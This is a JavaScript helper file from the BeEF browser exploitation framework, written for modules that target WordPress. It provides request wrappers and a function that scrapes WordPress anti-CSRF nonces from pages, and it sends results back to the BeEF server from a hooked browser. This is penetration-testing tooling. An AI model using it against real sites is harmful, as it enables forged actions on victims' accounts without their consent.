1
/*
2
  Copyright (c) Browser Exploitation Framework (BeEF) - https://beefproject.com
3
  See the file 'doc/COPYING' for copying permission
4
  
5
  Author @erwan_lr (WPScanTeam) - https://wpscan.org/
6
*/
7

8
// Pretty sure we could use jQuery as it's included by the hook.js
9
// Also, could have all that in as WP.prototype ?
10

11
function log(data, status = null) {
12
  if (status == 'error') { status = beef.are.status_error(); }
13
  if (status == 'success') { status = beef.are.status_success(); }
14

15
  beef.net.send(beef_command_url, beef_command_id, data, status);
16
  beef.debug(data);
17
};
18

19
function get(absolute_path, success) {
20
  var xhr = new XMLHttpRequest();
21

22
  xhr.open('GET', absolute_path);
23
  xhr.responseType = 'document';
24

25
  xhr.onerror = function() { log('GET ' + absolute_path + ' could not be done', 'error'); }
26
  
27
  xhr.onload = function() {
28
    //log('GET ' + absolute_path + ' resulted in a code ' + xhr.status);
29
    
30
    success(xhr);
31
  }
32

33
  xhr.send();
34
}
35

36
function post(absolute_path, data, success) {
37
  var params = typeof data == 'string' ? data : Object.keys(data).map(
38
    function(k){ return encodeURIComponent(k) + '=' + encodeURIComponent(data[k]) }
39
  ).join('&');
40

41
  var xhr = new XMLHttpRequest();
42

43
  xhr.open('POST', absolute_path);
44
  xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
45

46
  xhr.onerror = function() { log('POST ' + absolute_path + ' could not be done', 'error'); }
47
  
48
  xhr.onload = function() {
49
    //log('POST ' + absolute_path + ' resulted in a code ' + xhr.status);
50

51
    success(xhr);
52
  }
53

54
  xhr.send(params);
55
}
56

57
function post_as_binary(absolute_path, boundary, data, success) {
58
  var xhr = new XMLHttpRequest();
59

60
  // for WebKit-based browsers
61
  if (!XMLHttpRequest.prototype.sendAsBinary) {
62
    XMLHttpRequest.prototype.sendAsBinary = function (sData) {
63
      var nBytes = sData.length, ui8Data = new Uint8Array(nBytes);
64
      
65
      for (var nIdx = 0; nIdx < nBytes; nIdx++) {
66
         ui8Data[nIdx] = sData.charCodeAt(nIdx) & 0xff;
67
      }
68
      /* send as ArrayBufferView...: */
69
      this.send(ui8Data);
70
    };
71
  }
72

73
  xhr.open('POST', absolute_path);
74
  xhr.setRequestHeader('Content-Type', 'multipart/form-data; boundary=' + boundary );
75

76
  xhr.responseType = 'document';
77

78
  xhr.onerror = function() { log('POST (Binary)' + absolute_path + ' could not be done', 'error'); }
79
  
80
  xhr.onload = function() {
81
    //log('POST (Binary) ' + absolute_path + ' resulted in a code ' + xhr.status);
82

83
    success(xhr);
84
  }
85

86
  xhr.sendAsBinary(data);
87
}
88

89
function get_nonce(absolute_path, nonce_id, success) {
90
  get(absolute_path, function(xhr) {
91
    if (xhr.status == 200) {
92
      var nonce_tag = xhr.responseXML.getElementById(nonce_id);
93
      
94
      if (nonce_tag == null) {
95
        log(absolute_path + ' - Unable to find nonce tag with id ' + nonce_id, 'error');
96
      }
97
      else {
98
        nonce = nonce_tag.getAttribute('value');
99

100
        //log('GET ' + absolute_path + ' - Nonce: ' + nonce);
101

102
        success(nonce);
103
      }
104
    } else {
105
      log('GET ' + absolute_path + ' - Status: ' + xhr.status, 'error');
106
    }
107
  });
108
}
109

110

111